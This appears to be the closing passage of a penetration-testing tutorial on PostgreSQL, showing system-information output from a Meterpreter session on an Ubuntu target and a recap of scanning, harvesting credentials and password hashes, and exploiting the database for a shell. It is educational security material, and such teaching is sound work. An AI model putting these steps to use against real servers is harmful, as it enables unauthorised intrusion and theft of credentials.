OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

Wrapping Up

Today we learned about PostgreSQL databases and how to gather information on them to aid in recon. First, we ran an Nmap scan to verify the service was open on the target. Next, we covered a variety of modules for collecting information, including version, login credentials, and password hashes. Finally, we used a module to exploit PostgreSQL, and ultimately obtained a Meterpreter session on the target.


Cover image by Tim van der Kuip/Unsplash
